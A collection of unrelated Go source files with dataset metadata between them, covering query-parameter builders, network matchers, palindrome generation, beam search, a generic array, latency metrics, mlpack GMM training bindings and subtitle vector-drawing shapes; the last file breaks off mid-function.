func (q GetPipelinesStatusQueryParams) SetOffset(v int32) GetPipelinesStatusQueryParams {
q.Offset = &v
return q
}
func (q GetPipelinesStatusQueryParams) SetPageSize(v int32) GetPipelinesStatusQueryParams {
q.PageSize = &v
return q
}
func (q GetPipelinesStatusQueryParams) SetSortDir(v string) GetPipelinesStatusQueryParams {
q.SortDir = v
return q
}
func (q GetPipelinesStatusQueryParams) SetSortField(v string) GetPipelinesStatusQueryParams {
q.SortField = v
return q
}
// GetRegistryQueryParams represents valid query parameters for the GetRegistry operation
// For convenience GetRegistryQueryParams can be formed in a single statement, for example:
// `v := GetRegistryQueryParams{}.SetLocal(...)`
type GetRegistryQueryParams struct {
// Local : local
Local *bool `key:"local"`
}
func (q GetRegistryQueryParams) SetLocal(v bool) GetRegistryQueryParams {
q.Local = &v
return q
}
// GetTemplateQueryParams represents valid query parameters for the GetTemplate operation
// For convenience GetTemplateQueryParams can be formed in a single statement, for example:
// `v := GetTemplateQueryParams{}.SetVersion(...)`
type GetTemplateQueryParams struct {
// Version : version of the template
Version *int64 `key:"version"`
}
func (q GetTemplateQueryParams) SetVersion(v int64) GetTemplateQueryParams {
q.Version = &v
return q
}
// ListConnectionsQueryParams represents valid query parameters for the ListConnections operation
// For convenience ListConnectionsQueryParams can be formed in a single statement, for example:
// `v := ListConnectionsQueryParams{}.SetConnectorId(...).SetCreateUserId(...).SetFunctionId(...).SetName(...).SetOffset(...).SetPageSize(...).SetShowSecretNames(...).SetSortDir(...).SetSortField(...)`
type ListConnectionsQueryParams struct {
ConnectorId string `key:"connectorId"`
CreateUserId string `key:"createUserId"`
FunctionId string `key:"functionId"`
Name string `key:"name"`
Offset *int32 `key:"offset"`
PageSize *int32 `key:"pageSize"`
ShowSecretNames string `key:"showSecretNames"`
// SortDir : Specify either ascending ('asc') or descending ('desc') sort order for a given field (sortField), which must be set for sortDir to apply. Defaults to 'asc'.
SortDir string `key:"sortDir"`
SortField string `key:"sortField"`
}
func (q ListConnectionsQueryParams) SetConnectorId(v string) ListConnectionsQueryParams {
q.ConnectorId = v
return q
}
func (q ListConnectionsQueryParams) SetCreateUserId(v string) ListConnectionsQueryParams {
q.CreateUserId = v
return q
}
func (q ListConnectionsQueryParams) SetFunctionId(v string) ListConnectionsQueryParams {
q.FunctionId = v
return q
}
func (q ListConnectionsQueryParams) SetName(v string) ListConnectionsQueryParams {
q.Name = v
return q
}
func (q ListConnectionsQueryParams) SetOffset(v int32) ListConnectionsQueryParams {
q.Offset = &v
return q
}
func (q ListConnectionsQueryParams) SetPageSize(v int32) ListConnectionsQueryParams {
q.PageSize = &v
return q
}
func (q ListConnectionsQueryParams) SetShowSecretNames(v string) ListConnectionsQueryParams {
q.ShowSecretNames = v
return q
}
func (q ListConnectionsQueryParams) SetSortDir(v string) ListConnectionsQueryParams {
q.SortDir = v
return q
}
func (q ListConnectionsQueryParams) SetSortField(v string) ListConnectionsQueryParams {
q.SortField = v
return q
}
// ListPipelinesQueryParams represents valid query parameters for the ListPipelines operation
// For convenience ListPipelinesQueryParams can be formed in a single statement, for example:
// `v := ListPipelinesQueryParams{}.SetActivated(...).SetCreateUserId(...).SetIncludeData(...).SetName(...).SetOffset(...).SetPageSize(...).SetSortDir(...).SetSortField(...)`
type ListPipelinesQueryParams struct {
// Activated : activated
Activated *bool `key:"activated"`
// CreateUserId : createUserId
CreateUserId string `key:"createUserId"`
// IncludeData : includeData
IncludeData *bool `key:"includeData"`
// Name : name
Name string `key:"name"`
// Offset : offset
Offset *int32 `key:"offset"`
// PageSize : pageSize
PageSize *int32 `key:"pageSize"`
// SortDir : sortDir
SortDir string `key:"sortDir"`
// SortField : sortField
SortField string `key:"sortField"`
}
func (q ListPipelinesQueryParams) SetActivated(v bool) ListPipelinesQueryParams {
q.Activated = &v
return q
}
func (q ListPipelinesQueryParams) SetCreateUserId(v string) ListPipelinesQueryParams {
q.CreateUserId = v
return q
}
func (q ListPipelinesQueryParams) SetIncludeData(v bool) ListPipelinesQueryParams {
q.IncludeData = &v
return q
}
func (q ListPipelinesQueryParams) SetName(v string) ListPipelinesQueryParams {
q.Name = v
return q
}
func (q ListPipelinesQueryParams) SetOffset(v int32) ListPipelinesQueryParams {
q.Offset = &v
return q
}
func (q ListPipelinesQueryParams) SetPageSize(v int32) ListPipelinesQueryParams {
q.PageSize = &v
return q
}
func (q ListPipelinesQueryParams) SetSortDir(v string) ListPipelinesQueryParams {
q.SortDir = v
return q
}
func (q ListPipelinesQueryParams) SetSortField(v string) ListPipelinesQueryParams {
q.SortField = v
return q
}
// ListTemplatesQueryParams represents valid query parameters for the ListTemplates operation
// For convenience ListTemplatesQueryParams can be formed in a single statement, for example:
// `v := ListTemplatesQueryParams{}.SetOffset(...).SetPageSize(...).SetSortDir(...).SetSortField(...)`
type ListTemplatesQueryParams struct {
// Offset : offset
Offset *int32 `key:"offset"`
// PageSize : pageSize
PageSize *int32 `key:"pageSize"`
// SortDir : sortDir
SortDir string `key:"sortDir"`
// SortField : sortField
SortField string `key:"sortField"`
}
func (q ListTemplatesQueryParams) SetOffset(v int32) ListTemplatesQueryParams {
q.Offset = &v
return q
}
func (q ListTemplatesQueryParams) SetPageSize(v int32) ListTemplatesQueryParams {
q.PageSize = &v
return q
}
func (q ListTemplatesQueryParams) SetSortDir(v string) ListTemplatesQueryParams {
q.SortDir = v
return q
}
func (q ListTemplatesQueryParams) SetSortField(v string) ListTemplatesQueryParams {
q.SortField = v
return q
} | services/streams/param_generated.go | 0.897662 | 0.530115 | param_generated.go | starcoder |
package routing
import (
"fmt"
"net"
"strings"
"github.com/scionproto/scion/go/lib/addr"
)
// singleIAMatcher matches other ISD-AS numbers based on a single ISD-AS.
type singleIAMatcher struct {
IA addr.IA
}
// Match matches the input ISD-AS if both the ISD and the AS number are the same
// as the one of the matcher. Zero values of ISD and AS in the matchers ISD-AS
// are treated as wildcards and match everything.
func (m singleIAMatcher) Match(ia addr.IA) bool {
switch {
case m.IA.IsZero():
return true
case m.IA.I == 0:
return m.IA.A == ia.A
case m.IA.A == 0:
return m.IA.I == ia.I
default:
return m.IA.Equal(ia)
}
}
func (m singleIAMatcher) String() string {
return m.IA.String()
}
// negatedIAMatcher negates the result of the enclosed matcher.
type negatedIAMatcher struct {
IAMatcher
}
// Match negates the result of the enclosed matcher.
func (m negatedIAMatcher) Match(ia addr.IA) bool {
return !m.IAMatcher.Match(ia)
}
func (m negatedIAMatcher) String() string {
return fmt.Sprintf("!%s", m.IAMatcher)
}
// allowedNetworkMatcher is a simple IP network matcher based on allowed IP
// networks.
type allowedNetworkMatcher struct {
Allowed []*net.IPNet
}
// Match matches the input network if it is a subset of at least one allowed
// network.
func (m allowedNetworkMatcher) Match(network *net.IPNet) bool {
for _, n := range m.Allowed {
if isSubnet(network, n) {
return true
}
}
return false
}
func (m allowedNetworkMatcher) String() string {
networks := make([]string, 0, len(m.Allowed))
for _, network := range m.Allowed {
networks = append(networks, network.String())
}
return strings.Join(networks, ",")
}
// negatedNetworkMatcher negates the result of the enclosed matcher.
type negatedNetworkMatcher struct {
NetworkMatcher
}
// Match negates the result of the enclosed matcher.
func (m negatedNetworkMatcher) Match(network *net.IPNet) bool {
return !m.NetworkMatcher.Match(network)
}
func (m negatedNetworkMatcher) String() string {
return fmt.Sprintf("!%s", m.NetworkMatcher)
}
func isSubnet(sub, network *net.IPNet) bool {
nLen, _ := network.Mask.Size()
sLen, _ := sub.Mask.Size()
return network.Contains(sub.IP) && nLen <= sLen
} | go/pkg/gateway/routing/matchers.go | 0.646237 | 0.506408 | matchers.go | starcoder |
package palindrome
func multiplier(n int) int {
// Calculate 10^n efficiently
f := 10
m := 1
if n < 0 {
return -1
}
for n > 0 {
if n & 1 != 0 {
m *= f
}
f *= f
n >>= 1
}
return m
}
func Construct(l, m, x, c int) int {
if x == 0 {
x = multiplier(c)
}
if m >= 0 {
// Construct a palindrome with an odd number of digits
return (l * 10 + m) * x + ReverseDigits(l, c)
}
// Construct a palindrome with an even number of digits
return l * x + ReverseDigits(l, c)
}
func Prev(n int) int {
// Split the number up into the left and right halves
l, m, r, x, c := Split(n)
// If the right half is less than or equal to the reverse of left
// then the previous palindrome has a left side that is one less
if ReverseDigits(r, c) <= ReverseDigits(l, c) {
if m >= 0 {
// We have a middle digit, so decrement it
m--
if m < 0 {
// The middle digits underflowed so decrement
// the left side and reset the middle digit to 9
l--
m = 9
}
} else {
// No middle digit, just decrement the left side
l--
}
if l < x / 10 {
// The left side underflowed
if m >= 0 {
// There was a middle digit, add it to the left
// side and drop the middle digit
l = l * 10 + m
m = -1
} else {
// There was no middle digit, so add one and
// drop a digit off the right side
m = 9
c--
x /= 10
}
}
}
return Construct(l, m, x, c)
}
func Next(n int) int {
// Split the number up into the left and right halves
l, m, r, x, c := Split(n)
// If the right half is greater than or equal to the reverse of left
// then the next palindrome has a left side that is one greater
if ReverseDigits(r, c) >= ReverseDigits(l, c) {
if m >= 0 {
// We have a middle digit, so increment it
m++
if m > 9 {
// The middle digits overflowed so increment
// the left side and reset the middle digit to 0
l++
m = 0
}
} else {
// No middle digit, just increment the left side
l++
}
if l >= x {
// The left side overflowed
if m >= 0 {
// There was a middle digit, so just drop
// it and increment the digit count
m = -1
c++
x *= 10
} else {
// There was no middle digit, so add one and
// drop a digit off the left side
m = 0
l /= 10
}
}
}
return Construct(l, m, x, c)
} | gen.go | 0.669313 | 0.510192 | gen.go | starcoder |
package search
import (
"github.com/christat/search"
"time"
"github.com/christat/gost/queue"
"sort"
)
// Beam implements Beam Search.
// On each execution step, the most promising set of descendants (i.e. with the lowest Heuristic value) are enqueued, discarding the others (hence not keeping them in the queue).
// In practice, Beam Search behaves like a pruning-enabled Breadth-First Search, retaining at each expansion a maximum of descendants marked by beamSize.
func Beam(origin, target search.HeuristicState, beamSize uint, useNodeQueue ...bool) (path map[search.State]search.State, found bool) {
if beamSize == 0 {
beamSize = 1
}
filterSize := int(beamSize) // acts as an invalidator for negative values
path = make(map[search.State]search.State)
open := search.SelectQueueImplementation(useNodeQueue...)
open.Enqueue(origin)
for open.Size() > 0 {
vertex := open.Dequeue().(search.HeuristicState)
if vertex.Equals(target) {
found = true
break
}
enqueueBeamedDescendants(vertex, filterSize, open, path)
}
return
}
// Benchmark variant of Beam.
// It measures execution parameters (time, nodes expanded) them in a search.AlgorithmBenchmark entity.
func BenchmarkBeam(origin, target search.HeuristicState, beamSize uint, useNodeQueue ...bool) (path map[search.State]search.State, found bool, bench search.AlgorithmBenchmark) {
if beamSize == 0 {
beamSize = 1
}
filterSize := int(beamSize) // acts as an invalidator for negative values
path = make(map[search.State]search.State)
open := search.SelectQueueImplementation(useNodeQueue...)
var expansions uint = 0
start := time.Now()
open.Enqueue(origin)
for open.Size() > 0 {
vertex := open.Dequeue().(search.HeuristicState)
expansions++
if vertex.Equals(target) {
found = true
break
}
enqueueBeamedDescendants(vertex, filterSize, open, path)
}
elapsed := time.Since(start)
return path, found, search.AlgorithmBenchmark{ElapsedTime: elapsed, TotalExpansions: expansions}
}
func enqueueBeamedDescendants(vertex search.HeuristicState, filterSize int, open gost.Queue, path map[search.State]search.State) {
neighbors := vertex.Neighbors()
// children are sorted in ascending order according to their heuristic value
sort.Slice(neighbors, func(i, j int) bool {
return neighbors[i].(search.HeuristicState).Heuristic() < neighbors[j].(search.HeuristicState).Heuristic()
})
var beamResult []search.State
if len(neighbors) >= filterSize {
beamResult = neighbors[0:filterSize]
} else {
beamResult = neighbors
}
for _, neighbor := range beamResult {
path[neighbor] = vertex
open.Enqueue(neighbor)
}
} | informed/beam.go | 0.731442 | 0.428652 | beam.go | starcoder |
package array
import (
"fmt"
"errors"
"reflect"
"github.com/golodash/structure/internal"
)
type (
Array[T any] struct {
Values []*T
size int
functions map[string]any
}
)
func New[T any](functions map[string]any) (*Array[T], error) {
a := &Array[T]{
Values: []*T{},
size: 0,
functions: map[string]any{},
}
for k, v := range functions {
if reflect.TypeOf(v).Kind() == reflect.Func {
f := reflect.TypeOf(v)
// checks if function's first input is type of *Array[T]
if f.NumIn() > 0 && f.In(0).Kind() == reflect.Ptr && f.In(0).String() == reflect.TypeOf(a).String() {
a.functions[k] = v
} else {
return nil, errors.New(fmt.Sprintf("`%s` is a function but its first input must be type of %s", k, reflect.TypeOf(a).String()))
}
} else {
return nil, errors.New(fmt.Sprintf("`%s` is not a function", k))
}
}
return a, nil
}
func (a *Array[T]) Clear() {
a.Values = []*T{}
a.size = 0
}
func (a *Array[T]) Run(function string, params... any) ([]reflect.Value, error) {
params = append([]any{a}, params...)
if v, ok := a.functions[function]; ok {
return internal.CallJobFuncWithParams(v, params)
}
return nil, errors.New(fmt.Sprintf("%s not found", function))
}
func (a *Array[T]) oneSizePlus() {
a.size++
}
func (a *Array[T]) oneSizeMinus() {
a.size--
if a.size < 0 {
a.size = 0
}
}
func (a *Array[T]) PeekFirst() *T {
if a.size == 0 {
return nil
}
return a.Values[0]
}
func (a *Array[T]) PeekLast() *T {
if a.size == 0 {
return nil
}
return a.Values[a.size-1]
}
func (a *Array[T]) Peek(index int) *T {
if index < 0 || index >= a.size {
return nil
}
return a.Values[index]
}
func (a *Array[T]) ReturnAsSlice() []T {
values := []T{}
for i := range a.Values {
values = append(values, *a.Values[i])
}
return values
}
func (a *Array[T]) PushLast(data *T) *T {
a.Values = append(a.Values, data)
a.oneSizePlus()
return data
}
func (a *Array[T]) PushFirst(data *T) *T {
a.Values = append([]*T{data}, a.Values...)
a.oneSizePlus()
return data
}
func (a *Array[T]) Push(data *T, index int) *T {
if index < 0 || index > a.size {
return nil
}
if index == 0 {
return a.PushFirst(data)
} else if index == a.size {
return a.PushLast(data)
}
a.Values = append(a.Values[:index+1], a.Values[index:]...)
a.Values[index] = data
a.oneSizePlus()
return data
}
func (a *Array[T]) PopLast() *T {
if a.size == 0 {
return nil
}
a.oneSizeMinus()
data := a.Values[a.size-1]
a.Values = a.Values[:a.size]
return data
}
func (a *Array[T]) PopFirst() *T {
if a.size == 0 {
return nil
}
a.oneSizeMinus()
data := a.Values[0]
a.Values = a.Values[1:]
return data
}
func (a *Array[T]) Pop(index int) *T {
if index < 0 || index >= a.size {
return nil
}
if index == 0 {
return a.PopFirst()
} else if index == a.size-1 {
return a.PopLast()
}
data := a.Values[index]
a.Values = append(a.Values[:index], a.Values[index+1:]...)
a.oneSizeMinus()
return data
}
func (a *Array[T]) Displace(index1 int, index2 int) bool {
if index1 < 0 || index1 >= a.size || index2 < 0 || index2 >= a.size {
return false
}
v1 := a.Values[index1]
v2 := a.Values[index2]
a.ReplaceValue(index1, v2)
a.ReplaceValue(index2, v1)
return true
}
func (a *Array[T]) ReplaceValue(index int, data *T) bool {
if index < 0 || index >= a.size {
return false
}
a.Values[index] = data
return true
}
func (a *Array[T]) GetSize() int {
return a.size
} | array/array.go | 0.590661 | 0.53127 | array.go | starcoder |
package tachymeter
import (
"math"
"sort"
"sync/atomic"
)
// Calc summarizes Tachymeter sample data and returns it in the form of a *Metrics.
func (m *Tachymeter) Calc() *Metrics {
metrics := &Metrics{}
if atomic.LoadUint64(&m.count) == 0 {
return metrics
}
m.Lock()
metrics.Samples = int(math.Min(float64(atomic.LoadUint64(&m.count)), float64(m.size)))
metrics.Count = int(atomic.LoadUint64(&m.count))
times := make(timeSlice, metrics.Samples)
copy(times, m.times[:metrics.Samples])
sort.Sort(times)
metrics.Time.Cumulative = times.cumulative()
var rateTime float64
if m.wallTime != 0 {
rateTime = float64(metrics.Count) / float64(m.wallTime)
} else {
rateTime = float64(metrics.Samples) / float64(metrics.Time.Cumulative)
}
metrics.Rate.Second = rateTime * 1e9
m.Unlock()
metrics.Time.Avg = times.avg()
metrics.Time.HMean = times.hMean()
metrics.Time.P50 = times[times.Len()/2]
metrics.Time.P75 = times.p(0.75)
metrics.Time.P95 = times.p(0.95)
metrics.Time.P99 = times.p(0.99)
metrics.Time.P999 = times.p(0.999)
metrics.Time.Long5p = times.long5p()
metrics.Time.Short5p = times.short5p()
metrics.Time.Min = times.min()
metrics.Time.Max = times.max()
metrics.Time.Range = times.srange()
metrics.Time.StdDev = times.stdDev()
metrics.Histogram, metrics.HistogramBinSize = times.hgram(m.hBins)
return metrics
}
// Snapshot summarizes Tachymeter sample data and returns it in the form of a *Metrics.
func (m *Tachymeter) Snapshot() *Metrics {
metrics := &Metrics{}
if atomic.LoadUint64(&m.count) == 0 {
return metrics
}
m.Lock()
metrics.Samples = int(math.Min(float64(atomic.LoadUint64(&m.count)), float64(m.size)))
metrics.Count = int(atomic.LoadUint64(&m.count))
metrics.Wall = m.wallTime
ranks := make(timeRank, metrics.Samples)
copy(ranks, m.ranks[:metrics.Samples])
// GO 1.8 or above:
// sort.Slice(ranks)
// sort.Sort(ranks)
sort.Slice(ranks, func(i, j int) bool { return int64(ranks[i].duration) < int64(ranks[j].duration) })
metrics.Rank.Cumulative = ranks.cumulative()
var rateTime float64
if m.wallTime != 0 {
rateTime = float64(metrics.Count) / float64(m.wallTime)
} else {
rateTime = float64(metrics.Samples) / float64(metrics.Time.Cumulative)
}
metrics.Rate.Second = rateTime * 1e9
m.Unlock()
metrics.Rank.Avg = ranks.avg()
metrics.Rank.HMean = ranks.hMean()
metrics.Rank.P50 = ranks.p50() // ranks.p(0.50) //[ranks.Len()/2]
metrics.Rank.P75 = ranks.p(0.75)
metrics.Rank.P95 = ranks.p(0.95)
metrics.Rank.P99 = ranks.p(0.99)
metrics.Rank.P999 = ranks.p(0.999)
metrics.Rank.Long5p = ranks.long5p()
metrics.Rank.Short5p = ranks.short5p()
metrics.Rank.Max = ranks.maxStr()
metrics.Rank.Min = ranks.minStr()
metrics.Rank.Range = ranks.srange()
metrics.Time.StdDev = ranks.stdDev()
metrics.Histogram, metrics.HistogramBinSize = ranks.hgram(m.hBins)
return metrics
} | plugins/data/collection/stats/tachymeter/snapshot.go | 0.762778 | 0.467818 | snapshot.go | starcoder |
package mlpack
/*
#cgo CFLAGS: -I./capi -Wall
#cgo LDFLAGS: -L. -lmlpack_go_gmm_train
#include <capi/gmm_train.h>
#include <stdlib.h>
*/
import "C"
import "gonum.org/v1/gonum/mat"
type GmmTrainOptionalParam struct {
DiagonalCovariance bool
InputModel *gmm
KmeansMaxIterations int
MaxIterations int
NoForcePositive bool
Noise float64
Percentage float64
RefinedStart bool
Samplings int
Seed int
Tolerance float64
Trials int
Verbose bool
}
func GmmTrainOptions() *GmmTrainOptionalParam {
return &GmmTrainOptionalParam{
DiagonalCovariance: false,
InputModel: nil,
KmeansMaxIterations: 1000,
MaxIterations: 250,
NoForcePositive: false,
Noise: 0,
Percentage: 0.02,
RefinedStart: false,
Samplings: 100,
Seed: 0,
Tolerance: 1e-10,
Trials: 1,
Verbose: false,
}
}
/*
This program takes a parametric estimate of a Gaussian mixture model (GMM)
using the EM algorithm to find the maximum likelihood estimate. The model may
be saved and reused by other mlpack GMM tools.
The input data to train on must be specified with the "Input" parameter, and
the number of Gaussians in the model must be specified with the "Gaussians"
parameter. Optionally, many trials with different random initializations may
be run, and the result with highest log-likelihood on the training data will
be taken. The number of trials to run is specified with the "Trials"
parameter. By default, only one trial is run.
The tolerance for convergence and maximum number of iterations of the EM
algorithm are specified with the "Tolerance" and "MaxIterations" parameters,
respectively. The GMM may be initialized for training with another model,
specified with the "InputModel" parameter. Otherwise, the model is initialized
by running k-means on the data. The k-means clustering initialization can be
controlled with the "KmeansMaxIterations", "RefinedStart", "Samplings", and
"Percentage" parameters. If "RefinedStart" is specified, then the
Bradley-Fayyad refined start initialization will be used. This can often lead
to better clustering results.
The 'diagonal_covariance' flag will cause the learned covariances to be
diagonal matrices. This significantly simplifies the model itself and causes
training to be faster, but restricts the ability to fit more complex GMMs.
If GMM training fails with an error indicating that a covariance matrix could
not be inverted, make sure that the "NoForcePositive" parameter is not
specified. Alternately, adding a small amount of Gaussian noise (using the
"Noise" parameter) to the entire dataset may help prevent Gaussians with zero
variance in a particular dimension, which is usually the cause of
non-invertible covariance matrices.
The "NoForcePositive" parameter, if set, will avoid the checks after each
iteration of the EM algorithm which ensure that the covariance matrices are
positive definite. Specifying the flag can cause faster runtime, but may also
cause non-positive definite covariance matrices, which will cause the program
to crash.
As an example, to train a 6-Gaussian GMM on the data in data with a maximum of
100 iterations of EM and 3 trials, saving the trained GMM to gmm, the
following command can be used:
// Initialize optional parameters for GmmTrain().
param := mlpack.GmmTrainOptions()
param.Trials = 3
gmm := mlpack.GmmTrain(data, 6, param)
To re-train that GMM on another set of data data2, the following command may
be used:
// Initialize optional parameters for GmmTrain().
param := mlpack.GmmTrainOptions()
param.InputModel = &gmm
new_gmm := mlpack.GmmTrain(data2, 6, param)
Input parameters:
- gaussians (int): Number of Gaussians in the GMM.
- input (mat.Dense): The training data on which the model will be fit.
- DiagonalCovariance (bool): Force the covariance of the Gaussians to
be diagonal. This can accelerate training time significantly.
- InputModel (gmm): Initial input GMM model to start training with.
- KmeansMaxIterations (int): Maximum number of iterations for the
k-means algorithm (used to initialize EM). Default value 1000.
- MaxIterations (int): Maximum number of iterations of EM algorithm
(passing 0 will run until convergence). Default value 250.
- NoForcePositive (bool): Do not force the covariance matrices to be
positive definite.
- Noise (float64): Variance of zero-mean Gaussian noise to add to data.
Default value 0.
- Percentage (float64): If using --refined_start, specify the
percentage of the dataset used for each sampling (should be between 0.0
and 1.0). Default value 0.02.
- RefinedStart (bool): During the initialization, use refined initial
positions for k-means clustering (Bradley and Fayyad, 1998).
- Samplings (int): If using --refined_start, specify the number of
samplings used for initial points. Default value 100.
- Seed (int): Random seed. If 0, 'std::time(NULL)' is used. Default
value 0.
- Tolerance (float64): Tolerance for convergence of EM. Default value
1e-10.
- Trials (int): Number of trials to perform in training GMM. Default
value 1.
- Verbose (bool): Display informational messages and the full list of
parameters and timers at the end of execution.
Output parameters:
- outputModel (gmm): Output for trained GMM model.
*/
func GmmTrain(gaussians int, input *mat.Dense, param *GmmTrainOptionalParam) (gmm) {
resetTimers()
enableTimers()
disableBacktrace()
disableVerbose()
restoreSettings("Gaussian Mixture Model (GMM) Training")
// Detect if the parameter was passed; set if so.
setParamInt("gaussians", gaussians)
setPassed("gaussians")
// Detect if the parameter was passed; set if so.
gonumToArmaMat("input", input)
setPassed("input")
// Detect if the parameter was passed; set if so.
if param.DiagonalCovariance != false {
setParamBool("diagonal_covariance", param.DiagonalCovariance)
setPassed("diagonal_covariance")
}
// Detect if the parameter was passed; set if so.
if param.InputModel != nil {
setGMM("input_model", param.InputModel)
setPassed("input_model")
}
// Detect if the parameter was passed; set if so.
if param.KmeansMaxIterations != 1000 {
setParamInt("kmeans_max_iterations", param.KmeansMaxIterations)
setPassed("kmeans_max_iterations")
}
// Detect if the parameter was passed; set if so.
if param.MaxIterations != 250 {
setParamInt("max_iterations", param.MaxIterations)
setPassed("max_iterations")
}
// Detect if the parameter was passed; set if so.
if param.NoForcePositive != false {
setParamBool("no_force_positive", param.NoForcePositive)
setPassed("no_force_positive")
}
// Detect if the parameter was passed; set if so.
if param.Noise != 0 {
setParamDouble("noise", param.Noise)
setPassed("noise")
}
// Detect if the parameter was passed; set if so.
if param.Percentage != 0.02 {
setParamDouble("percentage", param.Percentage)
setPassed("percentage")
}
// Detect if the parameter was passed; set if so.
if param.RefinedStart != false {
setParamBool("refined_start", param.RefinedStart)
setPassed("refined_start")
}
// Detect if the parameter was passed; set if so.
if param.Samplings != 100 {
setParamInt("samplings", param.Samplings)
setPassed("samplings")
}
// Detect if the parameter was passed; set if so.
if param.Seed != 0 {
setParamInt("seed", param.Seed)
setPassed("seed")
}
// Detect if the parameter was passed; set if so.
if param.Tolerance != 1e-10 {
setParamDouble("tolerance", param.Tolerance)
setPassed("tolerance")
}
// Detect if the parameter was passed; set if so.
if param.Trials != 1 {
setParamInt("trials", param.Trials)
setPassed("trials")
}
// Detect if the parameter was passed; set if so.
if param.Verbose != false {
setParamBool("verbose", param.Verbose)
setPassed("verbose")
enableVerbose()
}
// Mark all output options as passed.
setPassed("output_model")
// Call the mlpack program.
C.mlpackGmmTrain()
// Initialize result variable and get output.
var outputModel gmm
outputModel.getGMM("output_model")
// Clear settings.
clearSettings()
// Return output(s).
return outputModel
} | gmm_train.go | 0.732018 | 0.458106 | gmm_train.go | starcoder |
package draw
import (
"fmt"
"math"
"regexp"
"strings"
"github.com/Alquimista/eyecandy/utils"
)
type Filter func(m string) string
type Shape struct {
draw string
}
// M Draw Move
func (d Shape) M(x, y int) *Shape {
d.draw += fmt.Sprintf(`m %d %d `, x, y)
return &d
}
// N Draw Move (no closing)
func (d Shape) N(x, y int) *Shape {
d.draw += fmt.Sprintf(`n %d %d `, x, y)
return &d
}
// L Line
func (d Shape) L(x, y int) *Shape {
d.draw += fmt.Sprintf(`l %d %d `, x, y)
return &d
}
// B Bézier
func (d Shape) B(args ...int) *Shape {
lenARGS := len(args)
if 6 > lenARGS {
panic("Not enough parameters.")
} else if lenARGS == 6 {
x1, y1, x2, y2, x3, y3 := args[0], args[1], args[2],
args[3], args[4], args[5]
d.draw += fmt.Sprintf(`b %d %d %d %d %d %d `, x1, y1, x2, y2, x3, y3)
} else if lenARGS%2 == 0 {
bspline := "s "
for _, arg := range args {
bspline += fmt.Sprintf(`%d `, arg)
}
d.draw += bspline + "c"
} else {
panic("Wrong parameter count.")
}
return &d
}
// Clip Vector Drawing
func (d Shape) Clip(mode int) string {
if mode < 0 && mode == 3 && mode > 4 {
panic("Draw mode parameter accept int number in range [1,2,4].")
}
return fmt.Sprintf(`\clip(%d,%s)`, mode, d)
}
// IClip Inverse Vector Drawing
func (d Shape) IClip(mode int) string {
if mode < 0 && mode == 3 && mode > 4 {
panic("Draw mode parameter accept int number in range [1,2,4].")
}
return fmt.Sprintf(`\iclip(%d,%s)`, mode, d)
}
// Draw Drawing command
func (d Shape) Draw(mode int) string {
if mode < 0 && mode == 3 && mode > 4 {
panic("Draw mode parameter accept int number in range [1,2,4].")
}
return fmt.Sprintf(`{\p%d}%s{\p0}`, mode, d)
}
// String string
func (d Shape) String() string {
return d.draw
}
// NewScript create a new Script Struct with defaults
func NewShape() *Shape {
return &Shape{}
}
func Poligon(r int, s int) *Shape {
iangle := 360.0 / float64(s)
angle := 90.0 + (iangle / 2.0)
d := NewShape()
d = d.M(utils.Polar2Rect(float64(r), angle))
angle += iangle
for i := 1; i < s+1; i++ {
// convert polar to rectangular
d = d.L(utils.Polar2Rect(float64(r), angle))
angle += iangle
}
d = d.Translate(r, r)
return d
}
func Pentagon(r int) *Shape {
return Poligon(r, 5)
}
func Hexagon(r int) *Shape {
return Poligon(r, 6)
}
func Star(r1 int, r2 int, spikes int) *Shape {
// the smallest radio is always the inner circle
if r1 > r2 {
r1, r2 = r2, r1
}
iangle := 360.0 / float64(spikes)
angle1 := -90.0 + (iangle / 2.0)
angle2 := angle1 + (iangle / 2.0)
d := NewShape()
for i := 0; i < spikes+1; i++ {
// ass draw commands
// convert polar to rectangular
if i == 0 {
d = d.M(utils.Polar2Rect(float64(r1), angle1))
} else {
d = d.L(utils.Polar2Rect(float64(r1), angle1))
}
d = d.L(utils.Polar2Rect(float64(r2), angle2))
angle1 += iangle
angle2 += iangle
}
d = d.Translate(r2, r2)
return d
}
func Pixel() *Shape {
return Square(1, 1)
}
func Dot() *Shape {
return Circle(1, false)
}
func Square(w, h int) *Shape {
d := NewShape()
d = d.M(0, 0)
d = d.L(w, 0)
d = d.L(w, h)
d = d.L(0, h)
return d
}
func Rectangle(x1, y1, x2, y2 int) *Shape {
d := NewShape()
d = d.M(x1, y1)
d = d.L(x2, y1)
d = d.L(x2, y2)
d = d.L(x1, y2)
return d
}
func Circle(r int, subtract bool) *Shape {
resize := func(m string) string {
return fmt.Sprintf(`%g`, (utils.Str2float(m)/100.0)*float64(r)*2.0)
}
swapCoords := func(m string) string {
pos := strings.Split(m, " ")
return fmt.Sprintf(`%s %s`, pos[1], pos[0])
}
d := NewShape()
d.draw = "m 50 0 b 22 0 0 22 0 50 b 0 78 22 100 50 100 b 78 100 100 78 " +
"100 50 b 100 22 78 0 50 0 "
if subtract {
d.draw = ShapeFilter(d.draw, swapCoords, "")
}
d.draw = ShapeFilter(d.draw, resize, `\d+`)
return d
}
func Triangle(size int) *Shape {
h := math.Sqrt(3) * (float64(size) / 2.0)
base := -h
d := NewShape()
d.draw = fmt.Sprintf(`m %g %g l %g %g 0 %g %g %g`,
float64(size)/2.0, float64(base),
float64(size), base+h,
base+h, float64(size)/2.0, base)
d.Translate(0, int(h+0.5))
return d
}
func Ring(radio, outlineWidth int) *Shape {
radio2 := radio - outlineWidth
circle2 := Circle(radio2, true)
circle2 = circle2.Translate(-radio2, -radio2)
circle2 = circle2.Translate(radio, radio)
d := NewShape()
d.draw = Circle(radio, false).draw + circle2.draw
return d
}
func Heart(size int) *Shape {
resize := func(m string) string {
return fmt.Sprintf(`%g`, (utils.Str2float(m)/30.0)*float64(size))
}
d := NewShape()
d.draw = "m 15 30 b 27 22 30 18 30 14 30 8 22 " +
"0 15 10 8 0 0 8 0 14 0 18 3 22 15 30"
d.draw = ShapeFilter(d.draw, resize, `\d+`)
return d
}
func ShapeFilter(shape string, f Filter, rx string) string {
r := regexp.MustCompile(`(-?\d+\.\d+|-?\d+)\s(-?\d+\.\d+|-?\d+)`)
if rx != "" {
r = regexp.MustCompile(rx)
}
return r.ReplaceAllStringFunc(shape, f)
}
func (d Shape) Scale(x, y float64) *Shape {
scale := func(m string) string {
pos := strings.Split(m, " ")
px := utils.Str2float(pos[0]) * x
py := utils.Str2float(pos[1]) * y
return fmt.Sprintf(`%g %g`, px, py)
}
d.draw = ShapeFilter(d.draw, scale, "")
return &d
}
func (d Shape) Translate(x, y int) *Shape {
move := func(m string) string {
